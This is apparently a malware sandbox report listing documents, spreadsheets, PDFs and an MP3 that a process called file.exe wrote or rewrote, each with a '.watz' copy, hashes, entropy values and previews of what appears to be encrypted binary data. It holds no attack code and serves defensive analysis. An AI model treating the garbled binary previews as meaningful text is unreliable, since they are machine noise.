SHA-256:	E0F98252D1461981DA475F2940DB8E43F9A2EED2BA63D4D17FA0B35084A70EE7
SHA-512:	59AE0DAC0DA52B002A44ADDCE62A753BEC25D1B8972F904FFAC30C2D4B7FE3EB46D253C23CA3266C6D2A759258D65EB7D7CF274055319F40A5B0890F8B12E797
Malicious:	false
Preview:	JSDNG.....(..R.{.......^)%.V.WX.5C..........`.!.i..c..U..............I)v..........%e....bT.P..8r..<6..3i...mC..h..;.>.\|..u..Y.w....)..^..^?ThwJ.f.[.4e.:yy..7=U...H.rkA\.D..V.H. 2....p...V.g...........h...t.U.7.....U..>;....D....X..,}I..4.q..#G....;.#..T.J...a.`v1.4..c..5.'.R...F.X&z.I.;..........]..(.......H.\.x........Iv....W.Y?...T_......l......8]..Q+c.[.u>.Z.5.H. .G5.....x....2.2....?h/...,@t....b-.:.6e.a.=....kiK.8......5H9>../A.D"....n....P.,,....c........,Fv....4._.<\|M.z. ....V.....O..l.u.,.@...PE..b^lW.P}eZe.....[x^..y.9.'?q...d...MY%.D.....r....a7.q.b'.mQ..yj&nyy?..ao.A..hX...f_.......=f.y....A..Z+.V.D.X(..>.\\|K......T..+D.$X....s.D...+,...R3.E...e...q.iP..A.f..^.u.c. .Hj0.o..].`F4ia...[.J0.l.Mw#.....j..(.o.R.>.~W..`.]-...G.yT.E...zP..5.....Sk...">..b....w....C...".&\..*.c......ND.L..\|..(.3Z.rb.Gb......#.5~....N.......0qm.S...^......K2.-....{.......B>..m...f...'......(.qg.IVtJn)V..G..!..wh.'.D..%./...8....[...D.6\|.P..

C:\Users\user\Documents\UMMBDNEQBN\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841063038579144
Encrypted:	false
SSDEEP:	24:0m3LZrRTDIz+YszFu3IUSvUKdTEZiz4GhIgYa9F7jNUPiHwnmRbD:0m3L1RHIz+Yh4Uc3T62JNUP9mBD
MD5:	028593F2605A2FBAC1E468B54025C4F1
SHA1:	C7A6379E7FDDED16E12B99EADF1A354A7DBDC9C3
SHA-256:	CC18ED37896841B657D7E504E4E3609FBE55089119E4031E4BFF0951BD7D8C31
SHA-512:	4E1A4B5BFD2AFEDC67189A8E558EA2E05B0DA3EB9A031198238C21FC6369DCC17B595FF80C401EF204A2495E46FB19F02BD99CA2E66D43321EA53AA41D804ACE
Malicious:	false
Preview:	UMMBD.B..#.3.I......ZN..{..p.....y..Z.u.:'..<..I..a..C..z~.r.\|.n.."............^(......4...@C.3..^...+D...Q......a.N..,........M.>z..{4.......Y..Gb{.s..N....p.t..u.3..FXa....a..a.2.(...z.3p..w........nm...y..z....'..C.?.;..W/..V{v.z.A....-.%d%.Vq....F..H..E.(Y...F..X.%.ye.E.J.4......V.N.'.S. T.cb2..I...Z....#...>.....}..E/.y...U'...5/..U,...'.<..S.O..p.N...4....{\%d.S.-.6..<u..T.^.u.7.8xN.....~.H'3..H.}06d....S....-K...?..Ar.A...2)^.!5Mb.ye2.^.v.M^./..#..".b....X2.%.iZ}.D7...^a.AAt.v^.t.LG..y..`.....d.I.<.6E..T.....T..Ta..0......s.z......V&..T.G...?y.=x....!{...i../...LG...Zj.....g..{.x....ti........O..<..\|[.u......,....}...\|n.:..RN.d.4Y.....ob....`..O,z.1.<n'$..Pm...-...!......H...u.nI,...-....xl.#c>...yq).<m..y...}....@...{.A...O&.."R.6D...\|.I.Jh.0 \....]..9j...............fh.E.,.v....+.R...../.m.c..L.f...)~@..XO.JSD7...M..s..~.......^..A.X@...,ik..V....5tYke..mZ.\|....y.z'...,+..Y}.....~../^.p2a....>..R........8(...9.....

C:\Users\user\Documents\UMMBDNEQBN\UMMBDNEQBN.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841063038579144
Encrypted:	false
SSDEEP:	24:0m3LZrRTDIz+YszFu3IUSvUKdTEZiz4GhIgYa9F7jNUPiHwnmRbD:0m3L1RHIz+Yh4Uc3T62JNUP9mBD
MD5:	028593F2605A2FBAC1E468B54025C4F1
SHA1:	C7A6379E7FDDED16E12B99EADF1A354A7DBDC9C3
SHA-256:	CC18ED37896841B657D7E504E4E3609FBE55089119E4031E4BFF0951BD7D8C31
SHA-512:	4E1A4B5BFD2AFEDC67189A8E558EA2E05B0DA3EB9A031198238C21FC6369DCC17B595FF80C401EF204A2495E46FB19F02BD99CA2E66D43321EA53AA41D804ACE
Malicious:	false
Preview:	UMMBD.B..#.3.I......ZN..{..p.....y..Z.u.:'..<..I..a..C..z~.r.\|.n.."............^(......4...@C.3..^...+D...Q......a.N..,........M.>z..{4.......Y..Gb{.s..N....p.t..u.3..FXa....a..a.2.(...z.3p..w........nm...y..z....'..C.?.;..W/..V{v.z.A....-.%d%.Vq....F..H..E.(Y...F..X.%.ye.E.J.4......V.N.'.S. T.cb2..I...Z....#...>.....}..E/.y...U'...5/..U,...'.<..S.O..p.N...4....{\%d.S.-.6..<u..T.^.u.7.8xN.....~.H'3..H.}06d....S....-K...?..Ar.A...2)^.!5Mb.ye2.^.v.M^./..#..".b....X2.%.iZ}.D7...^a.AAt.v^.t.LG..y..`.....d.I.<.6E..T.....T..Ta..0......s.z......V&..T.G...?y.=x....!{...i../...LG...Zj.....g..{.x....ti........O..<..\|[.u......,....}...\|n.:..RN.d.4Y.....ob....`..O,z.1.<n'$..Pm...-...!......H...u.nI,...-....xl.#c>...yq).<m..y...}....@...{.A...O&.."R.6D...\|.I.Jh.0 \....]..9j...............fh.E.,.v....+.R...../.m.c..L.f...)~@..XO.JSD7...M..s..~.......^..A.X@...,ik..V....5tYke..mZ.\|....y.z'...,+..Y}.....~../^.p2a....>..R........8(...9.....

C:\Users\user\Documents\UMMBDNEQBN\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.879761900026304
Encrypted:	false
SSDEEP:	24:9mgnwPl0rLQXA32EXyh0/12qeEab9vaiCthSoAbegSQyJdHF9BfFcKhTzzG3sbD:7nw969ohvaThSLyYyXNFn1S3mD
MD5:	C0283223A147645F5CAFB4EF40CF4797
SHA1:	0184F0C56E443B547113E85F554F65F62CFF8128
SHA-256:	38637E1921364B3628C52DE5F6670AD1560ABE949DAD9AC17EFB60A9D2876934
SHA-512:	BDC81A998850372125B125EA0DBDD37E3E1F8D10B6D3974DBAFD5CA29E9AD15E6ED5D574BC038426C9329D7AE27EBAE4631E35112B7EFF402E28E34FB741BD1D
Malicious:	false
Preview:	WUTJS{..........@.L.."..65)..#..Ff..4....X..`5...r'. ........x.:uP..[...C.,./...I.3m.7.N..4........s..^/....5..F.!O..}H^{a.c?.gB..4...z{..{U.\a.aG..O`QY..f.....z...2...q...R.....w...%.7.5&....:.o. ..\[\........j......A\$..#C...%:Ca.P....8....K.t...$d........>P.M.(8.......)..$y.hk....u....CS.o.n.....zW........M.C......-...(.H........:\xL&.L.Z;..Y..g.b....B....?.)..r~.l..ut2...z.1..%.....E`...7..A3"@...8?........:[....w....h.n....3y'...BmjQ.0.......{.........F.s.w$...d..!,.C.......&..a~.........t...r.8.XT..k.p....a../....i..w..4.D......j.@......l.j_a..S.]]%qt.1c......u..DV:.D...+3....G..s........O].7.;k:...,2...CT.5B.YgG.s.....N#sm...BQ....P..<...C.r..76........a\|.8.e.U.$'.M.R3S.@.X.....GH..3ZVx..._..i,z.m.?.qo...R..0t..4f..}lG?.\|...*^...o.P.]j.A..y.V.....s..&c....L..+.v...N......M..{..G.,.NC_..d.f....Gf...A...=.vgF\..8.+...L....6m...<U#D..W...&...W +...M1..$....\|...:W..Wc.1.<.....\[....KY2G._..W.V:....y..EG.g.BAQBw[....X....d....

C:\Users\user\Documents\UMMBDNEQBN\WUTJSCBCFX.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.879761900026304
Encrypted:	false
SSDEEP:	24:9mgnwPl0rLQXA32EXyh0/12qeEab9vaiCthSoAbegSQyJdHF9BfFcKhTzzG3sbD:7nw969ohvaThSLyYyXNFn1S3mD
MD5:	C0283223A147645F5CAFB4EF40CF4797
SHA1:	0184F0C56E443B547113E85F554F65F62CFF8128
SHA-256:	38637E1921364B3628C52DE5F6670AD1560ABE949DAD9AC17EFB60A9D2876934
SHA-512:	BDC81A998850372125B125EA0DBDD37E3E1F8D10B6D3974DBAFD5CA29E9AD15E6ED5D574BC038426C9329D7AE27EBAE4631E35112B7EFF402E28E34FB741BD1D
Malicious:	false
Preview:	WUTJS{..........@.L.."..65)..#..Ff..4....X..`5...r'. ........x.:uP..[...C.,./...I.3m.7.N..4........s..^/....5..F.!O..}H^{a.c?.gB..4...z{..{U.\a.aG..O`QY..f.....z...2...q...R.....w...%.7.5&....:.o. ..\[\........j......A\$..#C...%:Ca.P....8....K.t...$d........>P.M.(8.......)..$y.hk....u....CS.o.n.....zW........M.C......-...(.H........:\xL&.L.Z;..Y..g.b....B....?.)..r~.l..ut2...z.1..%.....E`...7..A3"@...8?........:[....w....h.n....3y'...BmjQ.0.......{.........F.s.w$...d..!,.C.......&..a~.........t...r.8.XT..k.p....a../....i..w..4.D......j.@......l.j_a..S.]]%qt.1c......u..DV:.D...+3....G..s........O].7.;k:...,2...CT.5B.YgG.s.....N#sm...BQ....P..<...C.r..76........a\|.8.e.U.$'.M.R3S.@.X.....GH..3ZVx..._..i,z.m.?.qo...R..0t..4f..}lG?.\|...*^...o.P.]j.A..y.V.....s..&c....L..+.v...N......M..{..G.,.NC_..d.f....Gf...A...=.vgF\..8.+...L....6m...<U#D..W...&...W +...M1..$....\|...:W..Wc.1.<.....\[....KY2G._..W.V:....y..EG.g.BAQBw[....X....d....

C:\Users\user\Documents\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851227166289677
Encrypted:	false
SSDEEP:	24:PQ05sdkwaFRA6ZKzQBdzhAYOJbCF8k+IX1Q2F6VV7KnGh2zZ5XsqOqo6ztJhMsbD:D5sdkwaFG69BfJBF/+IX1dH02zZRsioC
MD5:	59E70ED290875A1EB42C43ED23D96096
SHA1:	4A0BB0E53DD317B9AC9FC56E2CABB3A2F874E1C9
SHA-256:	D7A6196EB17BD5366DD4CA3F1E4504884CA42D152B0A56478815A9E8E425128C
SHA-512:	1D55A42ACB14073AC73229020A2366FD007B4A11BB20AD8A62857CCD588B3FFCEB292536B7AFC103FC90AD733FCE320CC976B5224C1B35370F270E3878E6CDCC
Malicious:	false
Preview:	VLZDGz5cCC.tm......k.o.#..............'.%!P{\|......Z..A..aO=....L...&(....}...e.z......!....4M...q.l.G..?k1)I......>..j..N..p.\|.m..9.V.>..!.qU..d.....u6.^.P....h..].D....'..............TV`....E{...@..^.Q!."..$.$[.Ag..Q.D..#..G!..zV.....WgB....0.... ..=OD.x.I.Q..).d...?Q....G.....SY..X.fb..n.Fd....\|...`p.P.f._.........DM....RO..i3..^...+.).Sg.P.8.u.h.Z...\|&.....A.b..$Pt{.k~.1.<;.%.<5.Y.......Lw...NO......!....._{.T......f.#]...o@..?,..2R.>-..G.d.+H<x....d=M...)....=......U...eA.Z.....Z...C..6<.+... 3f.z.].X...G...?..e.\....@.......V..h0.u..y]......0..x.z.o..B ....F..U..`..!.6..0=\|:....0..p.......j..;6....i.}.v^............N.K.......b%..J....~..=..['.{..Q.P.z....=.s.i...&TC{.XN..I.....]... .....8hB..t=6....oS}.X.~.e..Aw..m.]$....L%.V&......%.\ .3b../..i(.s.>O.d\|...8...=!2..C_L..@%.X.-........."_..]...QB4.._}.0gw.K...C.b.....gh..KF."Lp.c.DM.....y...q=V...,.....L..Ep~{z...v...;..0...k.Bs9..o0M:z.wj{...1..Eg....T.&.qQ....f.F.;

C:\Users\user\Documents\VLZDGUKUTZ.docx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851227166289677
Encrypted:	false
SSDEEP:	24:PQ05sdkwaFRA6ZKzQBdzhAYOJbCF8k+IX1Q2F6VV7KnGh2zZ5XsqOqo6ztJhMsbD:D5sdkwaFG69BfJBF/+IX1dH02zZRsioC
MD5:	59E70ED290875A1EB42C43ED23D96096
SHA1:	4A0BB0E53DD317B9AC9FC56E2CABB3A2F874E1C9
SHA-256:	D7A6196EB17BD5366DD4CA3F1E4504884CA42D152B0A56478815A9E8E425128C
SHA-512:	1D55A42ACB14073AC73229020A2366FD007B4A11BB20AD8A62857CCD588B3FFCEB292536B7AFC103FC90AD733FCE320CC976B5224C1B35370F270E3878E6CDCC
Malicious:	false
Preview:	VLZDGz5cCC.tm......k.o.#..............'.%!P{\|......Z..A..aO=....L...&(....}...e.z......!....4M...q.l.G..?k1)I......>..j..N..p.\|.m..9.V.>..!.qU..d.....u6.^.P....h..].D....'..............TV`....E{...@..^.Q!."..$.$[.Ag..Q.D..#..G!..zV.....WgB....0.... ..=OD.x.I.Q..).d...?Q....G.....SY..X.fb..n.Fd....\|...`p.P.f._.........DM....RO..i3..^...+.).Sg.P.8.u.h.Z...\|&.....A.b..$Pt{.k~.1.<;.%.<5.Y.......Lw...NO......!....._{.T......f.#]...o@..?,..2R.>-..G.d.+H<x....d=M...)....=......U...eA.Z.....Z...C..6<.+... 3f.z.].X...G...?..e.\....@.......V..h0.u..y]......0..x.z.o..B ....F..U..`..!.6..0=\|:....0..p.......j..;6....i.}.v^............N.K.......b%..J....~..=..['.{..Q.P.z....=.s.i...&TC{.XN..I.....]... .....8hB..t=6....oS}.X.~.e..Aw..m.]$....L%.V&......%.\ .3b../..i(.s.>O.d\|...8...=!2..C_L..@%.X.-........."_..]...QB4.._}.0gw.K...C.b.....gh..KF."Lp.c.DM.....y...q=V...,.....L..Ep~{z...v...;..0...k.Bs9..o0M:z.wj{...1..Eg....T.&.qQ....f.F.;

C:\Users\user\Documents\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848053487350936
Encrypted:	false
SSDEEP:	24:0XeRMxMsI9f/+si8ROJzl2ozFRQMqPyCouCjnBbvCnu/jwlNJGpPUfybD:0XzxMsef/+si8cNXEnyjjnBT4ApsfgD
MD5:	395C17A29CA1C322515D0756CFB0A2CB
SHA1:	8BBCE745389E028FACF5BB6F29A4C2AD24BF5E9E
SHA-256:	77D5CCDC161D67C725218669274D1A05AEA1A853FF8D66CDCC991FC265072F81
SHA-512:	D579633C71704746542B4AE2998CBB532D46333CF79A7CCE7263191D891AFF3D4920194212D5105EB7946CDECDBA7A76D95FB89C1FA26D1982D006188047C516
Malicious:	false
Preview:	VLZDG.....lu!k...~.....w...ml...xy;( r....z4:..pb.8l.k...Zj9Z.8.......V..)..Jj.....+^.{]c..g..p.D..$........I.N.Y>.;`..M'......c..).4.H.q..@..~...Z...?f.Q..s.Q.}../..._.Rj.46o;....k.s..zZ..>mJ%.x.......>.Z..y..(..@.`....@..&(...R..A.a..br....G_.?d...y.R0..X-N....V...\.........x.XX..b.q....`.. ....:8........'..SA=i'....Y..P.;.....Z.X....+.&....._.s^.F..,\|..>w~.....P.L.W%..?.6..C.hv.2;....,+d5.u.C..S!e.F.1.r.8...zz._.>...HD....]....-i;...-..0..j....>.>.....6..Z7.\...3.r..L..F.D\]..O...hL....b&u{.........f...x..MI...8!u.~...mn95).m..q....e...R..7...(q....2$.....8L.&^s..@...\....>.C^.......z..m.]-.....n...7........)..>.TW.2..AQiR......<#.c3......:....EBF.`...-qy.e.&r..^@........^m..[A./........%]oC.O...&U.D59.*.D.F'....}p..!..8o.....i.g.J....h...;N....;..1...b.}....N...c0..J..P......q...x..Q.Lx'.Glv:...........l...K.............+.....g.h=...4..a....3...RM.l.?.E...Q ....z6..t./p..9[.j...:!.#.....r.{...F..[...:..........O.yqbG..y.=?'<.

C:\Users\user\Documents\VLZDGUKUTZ.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848053487350936
Encrypted:	false
SSDEEP:	24:0XeRMxMsI9f/+si8ROJzl2ozFRQMqPyCouCjnBbvCnu/jwlNJGpPUfybD:0XzxMsef/+si8cNXEnyjjnBT4ApsfgD
MD5:	395C17A29CA1C322515D0756CFB0A2CB
SHA1:	8BBCE745389E028FACF5BB6F29A4C2AD24BF5E9E
SHA-256:	77D5CCDC161D67C725218669274D1A05AEA1A853FF8D66CDCC991FC265072F81
SHA-512:	D579633C71704746542B4AE2998CBB532D46333CF79A7CCE7263191D891AFF3D4920194212D5105EB7946CDECDBA7A76D95FB89C1FA26D1982D006188047C516
Malicious:	false
Preview:	VLZDG.....lu!k...~.....w...ml...xy;( r....z4:..pb.8l.k...Zj9Z.8.......V..)..Jj.....+^.{]c..g..p.D..$........I.N.Y>.;`..M'......c..).4.H.q..@..~...Z...?f.Q..s.Q.}../..._.Rj.46o;....k.s..zZ..>mJ%.x.......>.Z..y..(..@.`....@..&(...R..A.a..br....G_.?d...y.R0..X-N....V...\.........x.XX..b.q....`.. ....:8........'..SA=i'....Y..P.;.....Z.X....+.&....._.s^.F..,\|..>w~.....P.L.W%..?.6..C.hv.2;....,+d5.u.C..S!e.F.1.r.8...zz._.>...HD....]....-i;...-..0..j....>.>.....6..Z7.\...3.r..L..F.D\]..O...hL....b&u{.........f...x..MI...8!u.~...mn95).m..q....e...R..7...(q....2$.....8L.&^s..@...\....>.C^.......z..m.]-.....n...7........)..>.TW.2..AQiR......<#.c3......:....EBF.`...-qy.e.&r..^@........^m..[A./........%]oC.O...&U.D59.*.D.F'....}p..!..8o.....i.g.J....h...;N....;..1...b.}....N...c0..J..P......q...x..Q.Lx'.Glv:...........l...K.............+.....g.h=...4..a....3...RM.l.?.E...Q ....z6..t./p..9[.j...:!.#.....r.{...F..[...:..........O.yqbG..y.=?'<.

C:\Users\user\Documents\VLZDGUKUTZ\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854144243931481
Encrypted:	false
SSDEEP:	24:SFKlPFT48fGspIRm9UZeQg0ZyUMynL3o6oALjmhIaa1Fn9pbD:SAj8Od9UZxXyn6oG4IJn9JD
MD5:	98C22D5F2C65617B0FD8EC606D06670B
SHA1:	CF4BA13001824F6F0C2AD7E8472B28E777D1767C
SHA-256:	5B7B6AA06DC91D75B56CE4737776EDD7B222E318C2EF8846E7E9D5782D8B5D79
SHA-512:	964566229817B5948EE902DA0430F0FAAB7409A019CABE1474677E0A9DC7F583FCCF8A6C5E4AC9ECEC3C763695BA8BEBB35A9E169F553983CDF1C4F5C2F892AE
Malicious:	false
Preview:	DVWHK..D...$`u/....u..n-.A5l>..<l.WM....u..IR..y....s....E+......n..!}..j.]f.-.SK..Z.6y"..M.(.....q.m.I.}....1@{...;... .....&6....J...i9...../C(p.}4.t.11.A.O_.+.;!...(.s(w...EL...\|..%-03..GWs.....r.s.8Om..../....EB.w.)....n.Ld......06_Q.^...uY..J....#.. k..:.$E....Mb.:.F4.}.(..i...-1?h...(;.Nfp....k...A..-....4.R../.5j65..>.L&..i...Kf.o...y.a......".......q.......h.m.f.;.c..8.w}].p.l.Z.D..ka;.]9.r2n.B..$..d.<..r.W3v..\..L2rP=..a.....B.\.........3,..H....4..a.h.a^P..%....U....e.b[IA...........-N.O....G...`..:..B.pD.:.....0.a.`.).6N<.......]LR.G.A...W..2MU4E.X#..G.3.@?q.......z...!.4m.H.B6Xz5Q.....wt.K.........j.9.(I.b."$.PA..R....Hn..'.-.le<^wj.$..I..v,..........m..H...P.L..h!.+`....D..I..}M..D.....D..<J{......+.....c.....K......-smC.xo....Q..3..F4../.r..0V..E"...t....MU.4D.}a....u/..J........%.1@y.x.O$m..\..>qc.z.d.&+s....d.U2.}..)....#rc...V.ZKm...5.381..&QT.l._....)2....O..K.Z.{..u.....1m.~uu...S.-t.E..z...9:....Dw9.4...7u........[~.j..

C:\Users\user\Documents\VLZDGUKUTZ\DVWHKMNFNN.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854144243931481
Encrypted:	false
SSDEEP:	24:SFKlPFT48fGspIRm9UZeQg0ZyUMynL3o6oALjmhIaa1Fn9pbD:SAj8Od9UZxXyn6oG4IJn9JD
MD5:	98C22D5F2C65617B0FD8EC606D06670B
SHA1:	CF4BA13001824F6F0C2AD7E8472B28E777D1767C
SHA-256:	5B7B6AA06DC91D75B56CE4737776EDD7B222E318C2EF8846E7E9D5782D8B5D79
SHA-512:	964566229817B5948EE902DA0430F0FAAB7409A019CABE1474677E0A9DC7F583FCCF8A6C5E4AC9ECEC3C763695BA8BEBB35A9E169F553983CDF1C4F5C2F892AE
Malicious:	false
Preview:	DVWHK..D...$`u/....u..n-.A5l>..<l.WM....u..IR..y....s....E+......n..!}..j.]f.-.SK..Z.6y"..M.(.....q.m.I.}....1@{...;... .....&6....J...i9...../C(p.}4.t.11.A.O_.+.;!...(.s(w...EL...\|..%-03..GWs.....r.s.8Om..../....EB.w.)....n.Ld......06_Q.^...uY..J....#.. k..:.$E....Mb.:.F4.}.(..i...-1?h...(;.Nfp....k...A..-....4.R../.5j65..>.L&..i...Kf.o...y.a......".......q.......h.m.f.;.c..8.w}].p.l.Z.D..ka;.]9.r2n.B..$..d.<..r.W3v..\..L2rP=..a.....B.\.........3,..H....4..a.h.a^P..%....U....e.b[IA...........-N.O....G...`..:..B.pD.:.....0.a.`.).6N<.......]LR.G.A...W..2MU4E.X#..G.3.@?q.......z...!.4m.H.B6Xz5Q.....wt.K.........j.9.(I.b."$.PA..R....Hn..'.-.le<^wj.$..I..v,..........m..H...P.L..h!.+`....D..I..}M..D.....D..<J{......+.....c.....K......-smC.xo....Q..3..F4../.r..0V..E"...t....MU.4D.}a....u/..J........%.1@y.x.O$m..\..>qc.z.d.&+s....d.U2.}..)....#rc...V.ZKm...5.381..&QT.l._....)2....O..K.Z.{..u.....1m.~uu...S.-t.E..z...9:....Dw9.4...7u........[~.j..

C:\Users\user\Documents\VLZDGUKUTZ\JSDNGYCOWY.mp3

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8495544243504165
Encrypted:	false
SSDEEP:	24:S6llvMXt2frudnPHzAx31af5eOyBx3zrcjpr/zlXMnWSab4azWgmneExbD:J56dnPHzAxF+5eO0zwNr/ynWF4a7meCD
MD5:	F696A4CBC15A25F2C4B5A920392E778A
SHA1:	547EA2D226F871A5691899F0F1B0610FF12463CE
SHA-256:	329048DB14192DE702815A7A9F04FD4089DC6C7D23C61DC57ACD3D2549009D43
SHA-512:	6B16F76B7B9C543972009ADF354803242758BCEA4DAED2DD567683C28C1F790036F6A01C11AF1ED8E7501674C0E2E466BAE520E13832B7AE2FB2401E8150A794
Malicious:	false
Preview:	JSDNG....D......X..y.. ...O.....Q[.l{/Ws.`.........S.&..UR.;....-.E.H...,....aZj!..d.,....f...!e.U.\|....NH.yer....L../y}6...._.\.bA..(..9..g....t......z..q.?X{..^.9T.. .....5....D.p..}.1..C.x...7i........RN....0.K..../.. 9;.....G...w<...y~...,.xvn..X..{.....]........7.....}..b...Wfl......\k..k9..X!$.,......FI.......$y..#.>..>.tLB.............s..6U..............\..].`..ZS#9..K>.".au..K!.....u..0...r..kv.....l..f.k.../g.....2d{wA....CL...Pv..H.....hyW.4.j.c....9.M.(.(=.{?j...X{SSl...&.qM...X.}.....&.]..Q\|...#..L.P.2.z...D..\z.n...[.m8.,.]C.J..G...s.....u............o.hOp...!...K..2,.....y..vzP......!j'...r....(c.....Od..ye.....^.e..u.x....d ...I..;.;.M+.."..Z..4O[Z.....m.......&/.../..l.."U..$Nig.h...}.........p.c.....L..q.G.d.....6.....".......u=0.-dUL.q...iXM.7j..Q..c.v.4.y.<e.....N...0...V.W.P..r.. ...G$..wX.`..`..[...6<X.j.....K.N..}`7....a.70.&.(hC....wK>5.$qe.E....Z.KaK....]}g~...v.8....#U.5*..:.0N.....E.....d...c...p..X"..].

C:\Users\user\Documents\VLZDGUKUTZ\JSDNGYCOWY.mp3.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8495544243504165
Encrypted:	false
SSDEEP:	24:S6llvMXt2frudnPHzAx31af5eOyBx3zrcjpr/zlXMnWSab4azWgmneExbD:J56dnPHzAxF+5eO0zwNr/ynWF4a7meCD
MD5:	F696A4CBC15A25F2C4B5A920392E778A
SHA1:	547EA2D226F871A5691899F0F1B0610FF12463CE
SHA-256:	329048DB14192DE702815A7A9F04FD4089DC6C7D23C61DC57ACD3D2549009D43
SHA-512:	6B16F76B7B9C543972009ADF354803242758BCEA4DAED2DD567683C28C1F790036F6A01C11AF1ED8E7501674C0E2E466BAE520E13832B7AE2FB2401E8150A794
Malicious:	false
Preview:	JSDNG....D......X..y.. ...O.....Q[.l{/Ws.`.........S.&..UR.;....-.E.H...,....aZj!..d.,....f...!e.U.\|....NH.yer....L../y}6...._.\.bA..(..9..g....t......z..q.?X{..^.9T.. .....5....D.p..}.1..C.x...7i........RN....0.K..../.. 9;.....G...w<...y~...,.xvn..X..{.....]........7.....}..b...Wfl......\k..k9..X!$.,......FI.......$y..#.>..>.tLB.............s..6U..............\..].`..ZS#9..K>.".au..K!.....u..0...r..kv.....l..f.k.../g.....2d{wA....CL...Pv..H.....hyW.4.j.c....9.M.(.(=.{?j...X{SSl...&.qM...X.}.....&.]..Q\|...#..L.P.2.z...D..\z.n...[.m8.,.]C.J..G...s.....u............o.hOp...!...K..2,.....y..vzP......!j'...r....(c.....Od..ye.....^.e..u.x....d ...I..;.;.M+.."..Z..4O[Z.....m.......&/.../..l.."U..$Nig.h...}.........p.c.....L..q.G.d.....6.....".......u=0.-dUL.q...iXM.7j..Q..c.v.4.y.<e.....N...0...V.W.P..r.. ...G$..wX.`..`..[...6<X.j.....K.N..}`7....a.70.&.(hC....wK>5.$qe.E....Z.KaK....]}g~...v.8....#U.5*..:.0N.....E.....d...c...p..X"..].

C:\Users\user\Documents\VLZDGUKUTZ\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854851494605325
Encrypted:	false
SSDEEP:	24:+trSRkegiudGtXqEwP49U6d3NR/sNUWfyBWYamo05/TdkPOv15FBammMbqOZbD:+tSRkehuPEwwPncUWMWYamowT/DaseOR
MD5:	97AF955B166097E0308C75FC3919C698
SHA1:	D4B135D89D9FAEA9315A4CD5338A85EBF61C66D3
SHA-256:	571062355A90AD8EBAC830E53D4CF747D3063F9BF94BA46F82F8673AD1C00A79
SHA-512:	E9102441B166D6DC28BD65420D795B1E8AF3B00B0B9F7EAEB763FCC02C597E0C1E1748E4AF5C1A018777BD69D79DE1BE2645AF4BD7316C98D4512EF2B56EF958
Malicious:	false
Preview:	KATAX.<w.hG..........+c.h.MHG..a..v../...\|wdvX0.i.],..E_.._......m..r~?Q..-a.E.0.9x..s.n.x7...:.H .n8.8....7.Zz-.cb.Wq......t...I..R..G..~c.]z.\|.....R...Ol..(..`G.i.....f.c..\|.`.f=3~ ..^.......<a.....y.....'..`.....y.......4.`lRF:B.T._h.v%\U2f..9.....5.a7;y~.3..A\|...V2.....c.'~m...9...f.....2^.!%.2....g..!..n^..M...B..".O...;...e.-.S..>0..HGc...#]X.F.c..'.:!i.FA.[D.g..d,.-Z..[.B...GM...w<.x.....%_.....B,......-...a../.t..w.R...Y...m8t0..z..t....^.........V.....X-..Q.1.S3..=t..M..66.fT-WJ...Py..5R.#y0..>3..%.8...&1H..3.. .d/r.9y.K..0%.\.&1.}...9...0...ob....k..,.j......:_%`7.g....mKo.XA...2...>.z@.^.....'.(....D...H...Q..{f.D.........0V.gh.l&l..lR........d....P.....@.g.OI,....H........#.....}.[.....kZ..6F.o..M..nS~.H(c.)\....Bz..t.,.[.\|......$9........5....4...0.*.~..m$..%.?Ra.......Z.[X....+..=t...?...v.oh)..i...v.'j.<J...."..[&.. \=..6....m..........i..B...x.,g...XM.YY.jX.C.>.t)..KU..;............)....M...%...~$.:....T.:.M.

C:\Users\user\Documents\VLZDGUKUTZ\KATAXZVCPS.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854851494605325
Encrypted:	false
